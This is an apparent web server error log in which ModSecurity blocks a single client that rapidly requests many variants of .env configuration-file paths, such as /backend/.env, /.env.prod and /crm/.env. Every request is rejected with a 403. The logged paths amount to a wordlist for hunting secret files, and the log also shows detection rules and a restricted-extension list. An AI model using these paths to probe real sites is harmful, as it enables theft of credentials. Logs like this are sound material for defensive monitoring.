[Fri Dec 05 23:02:08.197301 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTNWYDVfWv2hMjcMNlzPCAAAAAw"]
[Fri Dec 05 23:02:08.197567 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTNWYDVfWv2hMjcMNlzPCAAAAAw"]
[Fri Dec 05 23:02:08.197794 2025] [:error] [pid 547546] [client 45.148.10.244:47872] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTNWYDVfWv2hMjcMNlzPCAAAAAw"]
[Fri Dec 05 23:02:12.865742 2025] [:error] [pid 547542] [client 45.148.10.244:43108] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTNWZC5p8hwAo-ApwKs-QwAAAAE"]
[Fri Dec 05 23:02:12.866003 2025] [:error] [pid 547542] [client 45.148.10.244:43108] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTNWZC5p8hwAo-ApwKs-QwAAAAE"]
[Fri Dec 05 23:02:12.866195 2025] [:error] [pid 547542] [client 45.148.10.244:43108] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTNWZC5p8hwAo-ApwKs-QwAAAAE"]
[Fri Dec 05 23:02:16.231343 2025] [:error] [pid 547553] [client 45.148.10.244:43126] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTNWaAQaAgNS7VtZJKWG7AAAABQ"]
[Fri Dec 05 23:02:16.231685 2025] [:error] [pid 547553] [client 45.148.10.244:43126] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTNWaAQaAgNS7VtZJKWG7AAAABQ"]
[Fri Dec 05 23:02:16.231908 2025] [:error] [pid 547553] [client 45.148.10.244:43126] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTNWaAQaAgNS7VtZJKWG7AAAABQ"]
[Fri Dec 05 23:02:22.279528 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aTNWbkr2qd9X944cebQoUQAAAAI"]
[Fri Dec 05 23:02:22.279760 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aTNWbkr2qd9X944cebQoUQAAAAI"]
[Fri Dec 05 23:02:22.279935 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aTNWbkr2qd9X944cebQoUQAAAAI"]
[Fri Dec 05 23:02:24.097541 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aTNWcEr2qd9X944cebQoVAAAAAI"]
[Fri Dec 05 23:02:24.097781 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aTNWcEr2qd9X944cebQoVAAAAAI"]
[Fri Dec 05 23:02:24.098005 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aTNWcEr2qd9X944cebQoVAAAAAI"]
[Fri Dec 05 23:02:24.537297 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aTNWcEr2qd9X944cebQoVQAAAAI"]
[Fri Dec 05 23:02:24.537529 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aTNWcEr2qd9X944cebQoVQAAAAI"]
[Fri Dec 05 23:02:24.537720 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aTNWcEr2qd9X944cebQoVQAAAAI"]
[Fri Dec 05 23:02:24.919635 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTNWcEr2qd9X944cebQoVgAAAAI"]
[Fri Dec 05 23:02:24.919901 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTNWcEr2qd9X944cebQoVgAAAAI"]
[Fri Dec 05 23:02:24.920101 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTNWcEr2qd9X944cebQoVgAAAAI"]
[Fri Dec 05 23:02:25.297410 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTNWcUr2qd9X944cebQoVwAAAAI"]
[Fri Dec 05 23:02:25.297645 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTNWcUr2qd9X944cebQoVwAAAAI"]
[Fri Dec 05 23:02:25.297857 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTNWcUr2qd9X944cebQoVwAAAAI"]
[Fri Dec 05 23:02:25.865830 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aTNWcUr2qd9X944cebQoWAAAAAI"]
[Fri Dec 05 23:02:25.866103 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aTNWcUr2qd9X944cebQoWAAAAAI"]
[Fri Dec 05 23:02:25.866303 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aTNWcUr2qd9X944cebQoWAAAAAI"]
[Fri Dec 05 23:02:27.086838 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTNWc0r2qd9X944cebQoWgAAAAI"]
[Fri Dec 05 23:02:27.086967 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTNWc0r2qd9X944cebQoWgAAAAI"]
[Fri Dec 05 23:02:27.087216 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTNWc0r2qd9X944cebQoWgAAAAI"]
[Fri Dec 05 23:02:27.087444 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTNWc0r2qd9X944cebQoWgAAAAI"]
[Fri Dec 05 23:02:28.290873 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aTNWdEr2qd9X944cebQoWwAAAAI"]
[Fri Dec 05 23:02:28.291150 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aTNWdEr2qd9X944cebQoWwAAAAI"]
[Fri Dec 05 23:02:28.291369 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aTNWdEr2qd9X944cebQoWwAAAAI"]
[Fri Dec 05 23:02:28.965372 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aTNWdEr2qd9X944cebQoXQAAAAI"]
[Fri Dec 05 23:02:28.965643 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aTNWdEr2qd9X944cebQoXQAAAAI"]
[Fri Dec 05 23:02:28.965842 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aTNWdEr2qd9X944cebQoXQAAAAI"]
[Fri Dec 05 23:02:29.809357 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aTNWdUr2qd9X944cebQoXgAAAAI"]
[Fri Dec 05 23:02:29.809592 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aTNWdUr2qd9X944cebQoXgAAAAI"]
[Fri Dec 05 23:02:29.809802 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aTNWdUr2qd9X944cebQoXgAAAAI"]
